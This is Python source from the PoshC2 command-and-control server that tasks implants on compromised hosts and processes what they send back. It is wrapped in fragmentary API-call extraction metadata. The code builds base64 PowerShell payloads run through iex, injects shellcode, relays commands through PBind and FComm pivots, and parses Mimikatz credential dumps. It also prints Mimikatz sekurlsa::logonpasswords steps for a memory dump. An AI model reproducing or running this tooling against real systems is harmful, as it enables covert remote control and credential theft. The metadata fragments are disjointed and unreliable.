'"""ApplyOperation.py"""'], {}), "(path, 'Contents', 'Resources', 'ApplyOperation.py')\n", (3014, 3066), False, 'import os\n'), ((3099, 3132), 'os.path.exists', 'os.path.exists', (['patch_script_path'], {}), '(patch_script_path)\n', (3113, 3132), False, 'import os\n'), ((3683, 3719), 'os.path.join', 'os.path.join', (['dirpath', '"""*.proxy.xml"""'], {}), "(dirpath, '*.proxy.xml')\n", (3695, 3719), False, 
'import os\n'), ((3800, 3822), 'xml.dom.minidom.parse', 'minidom.parse', (['xmlpath'], {}), '(xmlpath)\n', (3813, 3822), False, 'from xml.dom import minidom\n'), ((3931, 3967), 'os.path.join', 'os.path.join', (['dirpath', '"""Media_db.db"""'], {}), "(dirpath, 'Media_db.db')\n", (3943, 3967), False, 'import os\n'), ((3983, 4006), 'os.path.exists', 'os.path.exists', (['db_path'], {}), '(db_path)\n', (3997, 4006), False, 'import os\n'), ((6503, 6534), 'os.path.join', 'os.path.join', (['path', '"""setup.xml"""'], {}), "(path, 'setup.xml')\n", (6515, 6534), False, 'import os\n'), ((6550, 6574), 'os.path.exists', 'os.path.exists', (['setupxml'], {}), '(setupxml)\n', (6564, 6574), False, 'import os\n'), ((10655, 10697), 'os.path.join', 'os.path.join', (['installroot', '"""optionXML.xml"""'], {}), "(installroot, 'optionXML.xml')\n", (10667, 10697), False, 'import os\n'), ((10713, 10741), 'os.path.exists', 'os.path.exists', (['installerxml'], {}), '(installerxml)\n', (10727, 10741), False, 'import os\n'), ((4031, 4055), 'sqlite3.connect', 'sqlite3.connect', (['db_path'], {}), '(db_path)\n', (4046, 4055), False, 'import sqlite3\n'), ((6598, 6621), 'xml.dom.minidom.parse', 'minidom.parse', (['setupxml'], {}), '(setupxml)\n', (6611, 6621), False, 'from xml.dom import minidom\n'), ((7611, 7635), 'os.path.join', 'os.path.join', (['path', 'item'], {}), '(path, item)\n', (7623, 7635), False, 'import os\n'), ((10765, 10792), 'xml.dom.minidom.parse', 'minidom.parse', (['installerxml'], {}), '(installerxml)\n', (10778, 10792), False, 'from xml.dom import minidom\n'), ((18794, 18821), 'os.path.join', 'os.path.join', (['path', 'subitem'], {}), '(path, subitem)\n', (18806, 18821), False, 'import os\n'), ((18841, 18867), 'os.path.isdir', 'os.path.isdir', (['subitempath'], {}), '(subitempath)\n', (18854, 18867), False, 'import os\n'), ((4400, 4429), 'xml.dom.minidom.parseString', 'minidom.parseString', (['info_xml'], {}), '(info_xml)\n', (4419, 4429), False, 'from xml.dom import 
minidom\n'), ((22417, 22444), 'os.path.join', 'os.path.join', (['dirpath', '"""HD"""'], {}), "(dirpath, 'HD')\n", (22429, 22444), False, 'import os\n'), ((23209, 23250), 'os.path.join', 'os.path.join', (['uninstalldir', 'signaturefile'], {}), '(uninstalldir, signaturefile)\n', (23221, 23250), False, 'import os\n'), ((8570, 8594), 'os.path.join', 'os.path.join', (['path', 'item'], {}), '(path, item)\n', (8582, 8594), False, 'import os\n'), ((31183, 31217), 'os.path.join', 'os.path.join', (['uninstalldir', 'dbfile'], {}), '(uninstalldir, dbfile)\n', (31195, 31217), False, 'import os\n'), ((32128, 32162), 'os.path.join', 'os.path.join', (['uninstalldir', 'dbfile'], {}), '(uninstalldir, dbfile)\n', (32140, 32162), False, 'import os\n'), ((29247, 29294), 'os.path.join', 'os.path.join', (['uninstalldir', 'uninstall_file_name'], {}), '(uninstalldir, uninstall_file_name)\n', (29259, 29294), False, 'import os\n')] |
import datetime, hashlib, base64, traceback, os, re
import poshc2.server.database.DB as DB
from poshc2.Colours import Colours
from poshc2.server.Config import ModulesDirectory, DownloadsDirectory, ReportsDirectory
from poshc2.server.Implant import Implant
from poshc2.server.Core import decrypt, encrypt, default_response, decrypt_bytes_gzip, number_of_days, process_mimikatz, print_bad
from poshc2.server.Core import load_module, load_module_sharp, encrypt, default_response
from poshc2.server.payloads.Payloads import Payloads
from poshc2.server.PowerStatus import translate_power_status
from poshc2.Utils import randomuri
def newTaskOutput(uriPath, cookieVal, post_data, wsclient=False):
    '''Handle task output posted back by an implant.

    Matches the request URI against the known implants' RandomURIs,
    decrypts the cookie (task id) and the POST body (task output), then
    dispatches on the command that produced the output: module loads,
    PBind/FComm pivot connections, beacon interval changes, screenshots,
    shellcode uploads, file downloads, SafetyDump output, Mimikatz
    parsing, or plain output recording.

    Args:
        uriPath: request path; must contain an implant's RandomURI.
        cookieVal: encrypted cookie carrying the task id (and an
            optional message suffix after a '-').
        post_data: raw POST body; bytes from offset 1500 onward are the
            encrypted (and usually gzipped) task output.
        wsclient: unused here; kept for interface compatibility.
    '''
    now = datetime.datetime.now()
    all_implants = DB.get_implants_all()
    if not all_implants:
        print_bad("Received post request but no implants in database... has the project been cleaned but you're using the same URLs?")
        return
    for implant in all_implants:
        implantID = implant.ImplantID
        RandomURI = implant.RandomURI
        Hostname = implant.Hostname
        encKey = implant.Key
        Domain = implant.Domain
        User = implant.User
        implant_type = implant.Pivot
        if RandomURI in uriPath and cookieVal:
            DB.update_implant_lastseen(now.strftime("%Y-%m-%d %H:%M:%S"), RandomURI)
            # cookie carries the task id; body carries the output
            decCookie = decrypt(encKey, cookieVal)
            if implant_type == "JXA":
                # JXA implants send plain encrypted output (no gzip)
                rawoutput = decrypt(encKey, post_data[1500:])
            else:
                rawoutput = decrypt_bytes_gzip(encKey, post_data[1500:])
            if decCookie.startswith("Error"):
                print(Colours.RED)
                print("The multicmd errored: ")
                print(rawoutput)
                print(Colours.GREEN)
                return
            cookieMsg = ""
            if "-" in decCookie:
                # cookie format: "<taskid>-<message>"
                decCookie = decCookie.strip('\x00')
                splt = decCookie.split("-")
                if not splt[0].isdigit():
                    print(Colours.RED + "[!] Cookie %s is invalid" % decCookie + Colours.GREEN)
                    return
                else:
                    taskId = str(int(splt[0]))
                    cookieMsg = splt[1]
            else:
                taskId = str(int(decCookie.strip('\x00')))
            # zero-pad the task id to 5 digits for display
            taskIdStr = "0" * (5 - len(str(taskId))) + str(taskId)
            if taskId != "99999":
                executedCmd = DB.get_cmd_from_task_id(taskId)
                task_owner = DB.get_task_owner(taskId)
            else:
                # 99999 is the sentinel for background-task output: it is
                # appended to a file rather than recorded against a task
                print(Colours.END)
                timenow = now.strftime("%Y-%m-%d %H:%M:%S")
                print(f"Background task against implant {implantID} on host {Domain}\\{User} @ {Hostname} ({timenow}) (output appended to %sbackground-data.txt)" % ReportsDirectory)
                print(Colours.GREEN)
                print(rawoutput)
                # NOTE(review): file handle is never closed/flushed here
                miscData = open(("%sbackground-data.txt" % ReportsDirectory), "a+")
                miscData.write(rawoutput)
                return
            print(Colours.GREEN)
            if task_owner is not None:
                print("Task %s (%s) returned against implant %s on host %s\\%s @ %s (%s)" % (taskIdStr, task_owner, implantID, Domain, User, Hostname, now.strftime("%Y-%m-%d %H:%M:%S")))
            else:
                print("Task %s returned against implant %s on host %s\\%s @ %s (%s)" % (taskIdStr, implantID, Domain, User, Hostname, now.strftime("%Y-%m-%d %H:%M:%S")))
            try:
                # strip 123456...654321 framing markers from the output
                # NOTE(review): if rawoutput is bytes, re.sub raises and is
                # swallowed, leaving outputParsed unassigned — later
                # references would raise NameError; confirm intended.
                outputParsed = re.sub(r'123456(.+?)654321', '', rawoutput)
                outputParsed = outputParsed.rstrip()
            except Exception:
                pass
            if cookieMsg is not None and cookieMsg.lower().startswith("pwrstatusmsg"):
                # power-status updates are handled separately and not
                # recorded as task output
                translate_power_status(outputParsed, RandomURI)
                return
            if "loadmodule" in executedCmd and len(outputParsed.split()) == 0:
                # empty output from loadmodule means success
                print("Module loaded successfully")
                DB.update_task(taskId, "Module loaded successfully")
            elif "pbind-connect " in executedCmd and "PBind-Connected" in outputParsed or "PBind PBind start" in executedCmd and "PBind-Connected" in outputParsed:
                # a PBind pivot implant checked in: register it and task
                # it to load the core module
                outputParsed = re.search("PBind-Connected:.*", outputParsed)
                outputParsed = outputParsed[0].replace("PBind-Connected: ", "")
                Domain, User, Hostname, Arch, PID, Proxy = str(outputParsed).split(";")
                Proxy = Proxy.replace("\x00", "")
                if "\\" in User:
                    User = User[User.index("\\") + 1:]
                PivotString = "C# PBind"
                if "pbind-command run-exe PBind PBind start" in executedCmd:
                    PivotString = "C# PBind Pivot"
                newImplant = Implant(implantID, PivotString, str(Domain), str(User), str(Hostname), Arch, PID, None)
                newImplant.save()
                newImplant.display()
                newImplant.autoruns()
                if "pbind-command run-exe PBind PBind start" in executedCmd:
                    DB.new_task("pbind-pivot-loadmodule Stage2-Core.exe", "autoruns", RandomURI)
                else:
                    DB.new_task("pbind-loadmodule Stage2-Core.exe", "autoruns", RandomURI)
            elif "fcomm-connect " in executedCmd and "FComm-Connected" in outputParsed:
                # an FComm pivot implant checked in: same registration flow
                outputParsed = re.search("FComm-Connected:.*", outputParsed)
                outputParsed = outputParsed[0].replace("FComm-Connected: ", "")
                Domain, User, Hostname, Arch, PID, Proxy = str(outputParsed).split(";")
                Proxy = Proxy.replace("\x00", "")
                if "\\" in User:
                    User = User[User.index("\\") + 1:]
                newImplant = Implant(implantID, "C# FComm", str(Domain), str(User), str(Hostname), Arch, PID, None)
                newImplant.save()
                newImplant.display()
                newImplant.autoruns()
                DB.new_task("fcomm-loadmodule Stage2-Core.exe", "autoruns", RandomURI)
            elif executedCmd.lower().startswith("beacon "):
                # record the implant's new beacon interval
                new_sleep = executedCmd.replace('beacon ', '').strip()
                DB.update_sleep(new_sleep, RandomURI)
            elif "get-screenshot" in executedCmd.lower():
                try:
                    decoded = base64.b64decode(outputParsed)
                    filename = implant.User + "-" + now.strftime("%m%d%Y%H%M%S_" + randomuri())
                    output_file = open('%s%s.png' % (DownloadsDirectory, filename), 'wb')
                    print("Screenshot captured: %s%s.png" % (DownloadsDirectory, filename))
                    DB.update_task(taskId, "Screenshot captured: %s%s.png" % (DownloadsDirectory, filename))
                    output_file.write(decoded)
                    output_file.close()
                except Exception:
                    DB.update_task(taskId, "Screenshot not captured, the screen could be locked or this user does not have access to the screen!")
                    print("Screenshot not captured, the screen could be locked or this user does not have access to the screen!")
            elif (executedCmd.lower().startswith("$shellcode64")) or (executedCmd.lower().startswith("$shellcode64")):
                # NOTE(review): both sides test "$shellcode64" — the second
                # was presumably meant to be "$shellcode86"; confirm.
                DB.update_task(taskId, "Upload shellcode complete")
                print("Upload shellcode complete")
            elif (executedCmd.lower().startswith("run-exe core.program core inject-shellcode")) or (executedCmd.lower().startswith("pbind-command run-exe core.program core inject-shellcode")) or (executedCmd.lower().startswith("pbind-pivot-command run-exe core.program core inject-shellcode")):
                DB.update_task(taskId, "Upload shellcode complete")
                print(outputParsed)
            elif "download-file" in executedCmd.lower():
                # chunked file download: body is "<chunk#><total#><data>",
                # five characters each for the chunk counters
                try:
                    # derive a safe local filename from the command text
                    filename = executedCmd.lower().replace("download-files ", "")
                    filename = filename.replace("download-file ", "")
                    filename = filename.replace("-source ", "")
                    filename = filename.replace("..", "")
                    filename = filename.replace("'", "")
                    filename = filename.replace('"', "")
                    filename = filename.replace("\\", "/")
                    directory, filename = filename.rsplit('/', 1)
                    filename = filename.rstrip('\x00')
                    original_filename = filename.strip()
                    if not original_filename:
                        # the path ended in a separator: fall back to a
                        # name built from the directory components
                        directory = directory.rstrip('\x00')
                        directory = directory.replace("/", "_").replace("\\", "_").strip()
                        original_filename = directory
                    try:
                        if rawoutput.startswith("Error"):
                            print("Error downloading file: ")
                            print(rawoutput)
                            break
                        chunkNumber = rawoutput[:5]
                        totalChunks = rawoutput[5:10]
                    except Exception:
                        # rawoutput is bytes: decode the chunk counters
                        chunkNumber = rawoutput[:5].decode("utf-8")
                        totalChunks = rawoutput[5:10].decode("utf-8")
                    if (chunkNumber == "00001") and os.path.isfile('%s%s' % (DownloadsDirectory, filename)):
                        # first chunk but the target exists: pick the next
                        # free "-N" suffixed name instead of appending
                        counter = 1
                        while(os.path.isfile('%s%s' % (DownloadsDirectory, filename))):
                            if '.' in filename:
                                filename = original_filename[:original_filename.rfind('.')] + '-' + str(counter) + original_filename[original_filename.rfind('.'):]
                            else:
                                filename = original_filename + '-' + str(counter)
                            counter += 1
                    if (chunkNumber != "00001"):
                        # later chunk: find the file the earlier chunks
                        # were written to (highest existing "-N" suffix)
                        counter = 1
                        if not os.path.isfile('%s%s' % (DownloadsDirectory, filename)):
                            print("Error trying to download part of a file to a file that does not exist: %s" % filename)
                        while(os.path.isfile('%s%s' % (DownloadsDirectory, filename))):
                            # First find the 'next' file would be downloaded to
                            if '.' in filename:
                                filename = original_filename[:original_filename.rfind('.')] + '-' + str(counter) + original_filename[original_filename.rfind('.'):]
                            else:
                                filename = original_filename + '-' + str(counter)
                            counter += 1
                        if counter != 2:
                            # Then actually set the filename to this file - 1 unless it's the first one and exists without a counter
                            if '.' in filename:
                                filename = original_filename[:original_filename.rfind('.')] + '-' + str(counter - 2) + original_filename[original_filename.rfind('.'):]
                            else:
                                filename = original_filename + '-' + str(counter - 2)
                        else:
                            filename = original_filename
                    print("Download file part %s of %s to: %s" % (chunkNumber, totalChunks, filename))
                    DB.update_task(taskId, "Download file part %s of %s to: %s" % (chunkNumber, totalChunks, filename))
                    # append this chunk's payload (bytes after the two
                    # 5-char counters) to the target file
                    output_file = open('%s%s' % (DownloadsDirectory, filename), 'ab')
                    try:
                        output_file.write(rawoutput[10:])
                    except Exception:
                        output_file.write(rawoutput[10:].encode("utf-8"))
                    output_file.close()
                except Exception as e:
                    DB.update_task(taskId, "Error downloading file %s " % e)
                    print("Error downloading file %s " % e)
                    traceback.print_exc()
            elif "safetydump" in executedCmd.lower():
                # re-decrypt: minidump output is always gzipped bytes
                rawoutput = decrypt_bytes_gzip(encKey, post_data[1500:])
                if rawoutput.startswith("[-]") or rawoutput.startswith("ErrorCmd"):
                    DB.update_task(taskId, rawoutput)
                    print(rawoutput)
                else:
                    # NOTE(review): file handle is never explicitly closed
                    dumpname = "SafetyDump-Task-%s.b64" % taskIdStr
                    dumppath = "%s%s" % (DownloadsDirectory, dumpname)
                    open(dumppath, 'w').write(rawoutput)
                    message = "Dump written to: %s" % dumppath
                    message = message + "\n The base64 blob needs decoding, e.g. on Windows to use Mimikatz:"
                    message = message + "\n $filename = '.\\%s'" % dumpname
                    message = message + "\n $b64 = Get-Content $filename"
                    message = message + "\n $bytes = [System.Convert]::FromBase64String($b64)"
                    message = message + "\n [io.file]::WriteAllBytes(((Get-Item -Path \".\\\").FullName) + '\\safetydump.dmp', $bytes)"
                    message = message + "\n ./mimikatz.exe"
                    message = message + "\n sekurlsa::minidump safetydump.dmp"
                    message = message + "\n sekurlsa::logonpasswords"
                    message = message + "\nOr to just decode on Linux:"
                    message = message + f"\n base64 -id {dumpname} > dump.bin"
                    DB.update_task(taskId, message)
                    print(message)
            elif (executedCmd.lower().startswith("run-exe safetykatz") or "invoke-mimikatz" in executedCmd or executedCmd.lower().startswith("pbind-") or executedCmd.lower().startswith("fcomm-command") or executedCmd.lower().startswith("run-dll sharpsploit")) and "logonpasswords" in outputParsed.lower():
                # credential-dumping output: record it and also parse out
                # the credentials
                print("Parsing Mimikatz Output")
                DB.update_task(taskId, outputParsed)
                process_mimikatz(outputParsed)
                print(Colours.GREEN)
                print(outputParsed + Colours.END)
            else:
                # default: just record and display the output
                DB.update_task(taskId, outputParsed)
                print(Colours.GREEN)
                print(outputParsed + Colours.END)
def _locate_module(module_name):
    # Resolve an operator-supplied module name against the files actually on
    # disk in ModulesDirectory, case-insensitively.  Mirrors the original
    # scan: the last directory entry whose lowercased name is a substring of
    # the request wins; if nothing matches the name is returned unchanged
    # (the subsequent load_module* call then raises and is reported).
    for modname in os.listdir(ModulesDirectory):
        if modname.lower() in module_name.lower():
            module_name = modname
    return module_name


def _b64(value):
    # UTF-8 encode *value* and return its base64 encoding as a str.
    return base64.b64encode(value.encode("utf-8")).decode("utf-8")


def newTask(path):
    """Return the encrypted task payload for the implant checking in on *path*.

    Walks every implant; for the one whose RandomURI appears in *path* it
    processes all queued tasks, translating operator-friendly commands
    (upload-file, loadmodule, pslo, pbind-*/fcomm-*/pbind-pivot-* wrappers,
    PowerShell base64 wrapping, shellcode injection) into the implant wire
    format.  Each translated command is prefixed with a five-digit
    zero-padded task ID; commands are joined with the "!d-3dion@LD!-d"
    delimiter and returned as encrypt(EncKey, "multicmd...").

    A beacon with no queued tasks gets default_response(); None is returned
    when no implant URI matched *path*.
    """
    all_implants = DB.get_implants_all()
    commands = ""
    if all_implants:
        for i in all_implants:
            RandomURI = i.RandomURI
            EncKey = i.Key
            tasks = DB.get_newtasks(RandomURI)
            if RandomURI in path and tasks:
                for task in tasks:
                    command = task[2]
                    user = task[3]
                    user_command = command
                    implant = DB.get_implantbyrandomuri(RandomURI)
                    implant_type = DB.get_implanttype(RandomURI)
                    now = datetime.datetime.now()
                    # --- Pre-processing: keep bulky blobs out of the task log.
                    if (command.lower().startswith("$shellcode64")) or (command.lower().startswith("$shellcode86") or command.lower().startswith("run-exe core.program core inject-shellcode") or command.lower().startswith("run-exe pbind pbind run-exe core.program core inject-shellcode") or command.lower().startswith("pbind-command run-exe core.program core inject-shellcode") or command.lower().startswith("pbind-pivot-command run-exe core.program core inject-shellcode")):
                        # Log only the prefix; the shellcode blob follows '#'.
                        user_command = "Inject Shellcode: %s" % command[command.index("#") + 1:]
                        command = command[:command.index("#")]
                    elif (command.lower().startswith("run-jxa ")) or (command.lower().startswith("clipboard-monitor ")) or (command.lower().startswith("cred-popper ")):
                        # JXA-based commands carry their script after '#'.
                        user_command = command[:command.index("#")]
                        command = "run-jxa " + command[command.index("#") + 1:]
                    elif (command.lower().startswith('upload-file') or command.lower().startswith('pbind-command upload-file') or command.lower().startswith('fcomm-command upload-file')):
                        # Read the local file and embed it base64-encoded in the task.
                        PBind = command.lower().startswith('pbind-command upload-file')
                        FComm = command.lower().startswith('fcomm-command upload-file')
                        upload_args = command \
                            .replace('pbind-command upload-file', '') \
                            .replace('fcomm-command upload-file', '') \
                            .replace('upload-file', '')
                        upload_file_args_split = upload_args.split()
                        if len(upload_file_args_split) < 2:
                            print(Colours.RED)
                            print("Error parsing upload command: %s" % upload_args)
                            print(Colours.GREEN)
                            continue
                        upload_file = upload_file_args_split[0]
                        upload_file_destination = upload_file_args_split[1]
                        upload_args = upload_args.replace(upload_file, '')
                        upload_args = upload_args.replace(upload_file_destination, '')
                        with open(upload_file, "rb") as f:
                            upload_file_bytes = f.read()
                        if not upload_file_bytes:
                            print(Colours.RED + f"Error, no bytes read from the upload file, removing task: {upload_file}" + Colours.GREEN)
                            DB.del_newtasks(str(task[0]))
                            continue
                        upload_file_bytes_b64 = base64.b64encode(upload_file_bytes).decode("utf-8")
                        # Each implant type takes the payload in its own syntax.
                        if implant_type.lower().startswith('c#'):
                            command = f"upload-file {upload_file_bytes_b64};\"{upload_file_destination}\" {upload_args}"
                        elif implant_type.lower().startswith('ps'):
                            command = f"Upload-File -Destination \"{upload_file_destination}\" -Base64 {upload_file_bytes_b64} {upload_args}"
                        elif implant_type.lower().startswith('py'):
                            command = f"upload-file \"{upload_file_destination}\":{upload_file_bytes_b64} {upload_args}"
                        elif implant_type.lower().startswith('jxa'):
                            command = f"upload-file {upload_file_destination}:{upload_file_bytes_b64} {upload_args}"
                        else:
                            print(Colours.RED)
                            print("Error parsing upload command: %s" % upload_args)
                            print(Colours.GREEN)
                        if PBind:
                            command = f"pbind-command {command}"
                        if FComm:
                            command = f"fcomm-command {command}"
                        filehash = hashlib.md5(base64.b64decode(upload_file_bytes_b64)).hexdigest()
                        user_command = f"Uploading file: {upload_file} to {upload_file_destination} with md5sum: {filehash}"
                    # --- Record the task and echo it to the operator console.
                    taskId = DB.insert_task(RandomURI, user_command, user)
                    taskIdStr = str(taskId).zfill(5)
                    if len(str(taskId)) > 5:
                        raise ValueError('Task ID is greater than 5 characters which is not supported.')
                    print(Colours.YELLOW)
                    if user is not None and user != "":
                        print("Task %s (%s) issued against implant %s on host %s\\%s @ %s (%s)" % (taskIdStr, user, implant.ImplantID, implant.Domain, implant.User, implant.Hostname, now.strftime("%Y-%m-%d %H:%M:%S")))
                    else:
                        print("Task %s issued against implant %s on host %s\\%s @ %s (%s)" % (taskIdStr, implant.ImplantID, implant.Domain, implant.User, implant.Hostname, now.strftime("%Y-%m-%d %H:%M:%S")))
                    try:
                        # sharpwmi tasks embed large payloads; truncate the echo.
                        if (user_command.lower().startswith("run-exe sharpwmi.program sharpwmi action=execute") or user_command.lower().startswith("pbind-command run-exe sharpwmi.program sharpwmi action=execute") or user_command.lower().startswith("fcomm-command run-exe sharpwmi.program sharpwmi action=execute")):
                            print(user_command[0:200])
                            print("----TRUNCATED----")
                        else:
                            print(user_command)
                        print(Colours.END)
                    except Exception as e:
                        print("Cannot print output: %s" % e)
                    # --- Translate operator syntax into the implant wire format.
                    # Branch *tests* run on the raw task text (task[2]); the plain
                    # pbind-*/fcomm-* wrappers then transform the possibly already
                    # rewritten `command` (e.g. after upload-file pre-processing),
                    # so the two sources below are deliberate and must not be mixed.
                    if task[2].startswith("loadmodule "):
                        try:
                            module_name = (task[2]).replace("loadmodule ", "")
                            # .exe/.dll go through the sharp loader, everything
                            # else through the PowerShell loader.
                            if ".exe" in module_name or ".dll" in module_name:
                                modulestr = load_module_sharp(module_name)
                            else:
                                modulestr = load_module(module_name)
                            command = "loadmodule%s" % modulestr
                        except Exception as e:
                            print("Cannot find module, loadmodule is case sensitive!")
                            print(e)
                            command = ""
                    elif task[2].startswith("run-exe Program PS "):
                        try:
                            cmd = (task[2]).replace("run-exe Program PS ", "")
                            command = "run-exe Program PS %s" % _b64(cmd)
                        except Exception as e:
                            print("Cannot base64 the command for PS")
                            print(e)
                            traceback.print_exc()
                    elif task[2].startswith("pbind-pivot-command run-exe Program PS "):
                        try:
                            # Double-wrapped: PS payload inside PBind inside PBind.
                            cmd = (task[2]).replace("pbind-pivot-command run-exe Program PS ", "")
                            modulestr = _b64(f"run-exe Program PS {_b64(cmd)}")
                            command = "run-exe PBind PBind %s" % _b64(f"run-exe PBind PBind {modulestr}")
                        except Exception as e:
                            print("Cannot base64 the command for PS")
                            print(e)
                            traceback.print_exc()
                    elif task[2].startswith("pbind-command run-exe Program PS "):
                        try:
                            cmd = (task[2]).replace("pbind-command run-exe Program PS ", "")
                            command = "run-exe PBind PBind %s" % _b64(f"run-exe Program PS {_b64(cmd)}")
                        except Exception as e:
                            print("Cannot base64 the command for PS")
                            print(e)
                            traceback.print_exc()
                    elif task[2].startswith("fcomm-command run-exe Program PS "):
                        try:
                            cmd = (task[2]).replace("fcomm-command run-exe Program PS ", "")
                            command = "run-exe FComm.FCClass FComm run-exe Program PS %s" % _b64(cmd)
                        except Exception as e:
                            print("Cannot base64 the command for PS")
                            print(e)
                            traceback.print_exc()
                    elif task[2].startswith("pslo "):
                        try:
                            module_name = _locate_module((task[2]).replace("pslo ", ""))
                            command = "run-exe Program PS loadmodule%s" % load_module_sharp(module_name)
                        except Exception as e:
                            print("Cannot find module, loadmodule is case sensitive!")
                            print(e)
                            traceback.print_exc()
                    elif task[2].startswith("pbind-pslo"):
                        try:
                            module_name = _locate_module((task[2]).replace("pbind-pslo ", ""))
                            command = "run-exe PBind PBind \"run-exe Program PS loadmodule%s\"" % load_module_sharp(module_name)
                        except Exception as e:
                            print("Cannot find module, loadmodule is case sensitive!")
                            print(e)
                            traceback.print_exc()
                    elif task[2].startswith("pbind-pivot-loadmodule "):
                        try:
                            module_name = (task[2]).replace("pbind-pivot-loadmodule ", "")
                            if ".exe" in module_name or ".dll" in module_name:
                                modulestr = load_module_sharp(_locate_module(module_name))
                                base64string = _b64(f"run-exe PBind PBind \"loadmodule{modulestr}\"")
                                command = f"run-exe PBind PBind {base64string}"
                        except Exception as e:
                            print("Cannot find module, loadmodule is case sensitive!")
                            print(e)
                            traceback.print_exc()
                    elif task[2].startswith("fcomm-pslo"):
                        try:
                            module_name = _locate_module((task[2]).replace("fcomm-pslo ", ""))
                            command = "run-exe FComm.FCClass FComm \"run-exe Program PS loadmodule%s\"" % load_module_sharp(module_name)
                        except Exception as e:
                            print("Cannot find module, loadmodule is case sensitive!")
                            print(e)
                            traceback.print_exc()
                    elif task[2].startswith("pbind-loadmodule "):
                        try:
                            module_name = (task[2]).replace("pbind-loadmodule ", "")
                            if ".exe" in module_name or ".dll" in module_name:
                                modulestr = load_module_sharp(_locate_module(module_name))
                                command = "run-exe PBind PBind \"loadmodule%s\"" % modulestr
                            else:
                                # PowerShell modules are shipped as a base64 blob
                                # decoded and piped to iex on the implant side.
                                modulestr = load_module(_locate_module(module_name))
                                command = "run-exe PBind PBind \"`$mk = '%s';[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String(`$mk))|iex\"" % base64.b64encode(bytes(modulestr, "utf-8")).decode('utf-8')
                        except Exception as e:
                            print("Cannot find module, loadmodule is case sensitive!")
                            print(e)
                            traceback.print_exc()
                    elif task[2].startswith("pbind-command "):
                        try:
                            cmd = command.replace("pbind-command ", "")
                            command = "run-exe PBind PBind %s" % _b64(cmd)
                        except Exception as e:
                            print("Cannot base64 the command for PS")
                            print(e)
                            traceback.print_exc()
                    elif task[2].startswith("pbind-connect"):
                        command = command.replace("pbind-connect ", "run-exe PBind PBind start ")
                    elif task[2].startswith("pbind-kill"):
                        command = command.replace("pbind-kill", "run-exe PBind PBind kill-implant")
                    elif task[2].startswith("fcomm-loadmodule "):
                        try:
                            module_name = (task[2]).replace("fcomm-loadmodule ", "")
                            if ".exe" in module_name or ".dll" in module_name:
                                modulestr = load_module_sharp(_locate_module(module_name))
                                command = "run-exe FComm.FCClass FComm \"loadmodule%s\"" % modulestr
                            else:
                                modulestr = load_module(_locate_module(module_name))
                                command = "run-exe FComm.FCClass FComm \"`$mk = '%s';[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String(`$mk))|iex\"" % base64.b64encode(bytes(modulestr, "utf-8")).decode('utf-8')
                        except Exception as e:
                            print("Cannot find module, loadmodule is case sensitive!")
                            print(e)
                            traceback.print_exc()
                    elif task[2].startswith("fcomm-command "):
                        command = command.replace("fcomm-command ", "run-exe FComm.FCClass FComm ")
                    elif task[2].startswith("fcomm-connect"):
                        command = command.replace("fcomm-connect ", "run-exe FComm.FCClass FComm start ")
                    elif task[2].startswith("fcomm-kill"):
                        command = command.replace("fcomm-kill", "run-exe FComm.FCClass FComm kill-implant")
                    elif task[2].startswith("pbind-pivot-command "):
                        try:
                            cmd = command.replace("pbind-pivot-command ", "")
                            command = "run-exe PBind PBind %s" % _b64(f"run-exe PBind PBind {_b64(cmd)}")
                        except Exception as e:
                            print("Cannot base64 the command for PS")
                            print(e)
                            traceback.print_exc()
                    elif task[2].startswith("pbind-pivot-connect"):
                        command = command.replace("pbind-pivot-connect ", "run-exe PBind PBind run-exe PBind PBind start ")
                    elif task[2].startswith("pbind-pivot-kill"):
                        command = command.replace("pbind-pivot-kill", "run-exe PBind PBind run-exe PBind PBind kill-implant")
                    # Uncomment to print actual commands that are being sent
                    # if "AAAAAAAAAAAAAAAAAAAA" not in command:
                    #     print(Colours.BLUE + "Issuing Command: " + command + Colours.GREEN)
                    command = taskIdStr + command
                    if commands:
                        commands += "!d-3dion@LD!-d" + command
                    else:
                        commands += command
                    DB.del_newtasks(str(task[0]))
                # At least one task was queued, so commands is non-empty here.
                multicmd = "multicmd%s" % commands
                try:
                    responseVal = encrypt(EncKey, multicmd)
                except Exception as e:
                    responseVal = ""
                    print("Error encrypting value: %s" % e)
                now = datetime.datetime.now()
                DB.update_implant_lastseen(now.strftime("%Y-%m-%d %H:%M:%S"), RandomURI)
                return responseVal
            elif RandomURI in path and not tasks:
                # if there is no tasks but its a normal beacon send 200
                now = datetime.datetime.now()
                DB.update_implant_lastseen(now.strftime("%Y-%m-%d %H:%M:%S"), RandomURI)
                return default_response()
| [
"poshc2.server.Core.process_mimikatz",
"poshc2.server.database.DB.get_implanttype",
"base64.b64encode",
"poshc2.server.database.DB.get_implants_all",
"poshc2.server.database.DB.get_implantbyrandomuri",
"poshc2.server.database.DB.new_task",
"re.search",
"os.listdir",
"poshc2.Utils.randomuri",
"posh... | [((704, 727), 'datetime.datetime.now', 'datetime.datetime.now', ([], {}), '()\n', (725, 727), False, 'import datetime, hashlib, base64, traceback, os, re\n'), ((747, 768), 'poshc2.server.database.DB.get_implants_all', 'DB.get_implants_all', ([], {}), '()\n', (766, 768), True, 'import poshc2.server.database.DB as DB\n'), ((14384, 14405), 'poshc2.server.database.DB.get_implants_all', 'DB.get_implants_all', ([], {}), '()\n', (14403, 14405), True, 'import poshc2.server.database.DB as DB\n'), ((802, 938), 'poshc2.server.Core.print_bad', 'print_bad', (['"""Received post request but no implants in database... has the project been cleaned but you\'re using the same URLs?"""'], {}), '(\n "Received post request but no implants in database... has the project been cleaned but you\'re using the same URLs?"\n )\n', (811, 938), False, 'from poshc2.server.Core import decrypt, encrypt, default_response, decrypt_bytes_gzip, number_of_days, process_mimikatz, print_bad\n'), ((1371, 1397), 'poshc2.server.Core.decrypt', 'decrypt', (['encKey', 'cookieVal'], {}), '(encKey, cookieVal)\n', (1378, 1397), False, 'from poshc2.server.Core import decrypt, encrypt, default_response, decrypt_bytes_gzip, number_of_days, process_mimikatz, print_bad\n'), ((14587, 14613), 'poshc2.server.database.DB.get_newtasks', 'DB.get_newtasks', (['RandomURI'], {}), '(RandomURI)\n', (14602, 14613), True, 'import poshc2.server.database.DB as DB\n'), ((1464, 1497), 'poshc2.server.Core.decrypt', 'decrypt', (['encKey', 'post_data[1500:]'], {}), '(encKey, post_data[1500:])\n', (1471, 1497), False, 'from poshc2.server.Core import decrypt, encrypt, default_response, decrypt_bytes_gzip, number_of_days, process_mimikatz, print_bad\n'), ((1544, 1588), 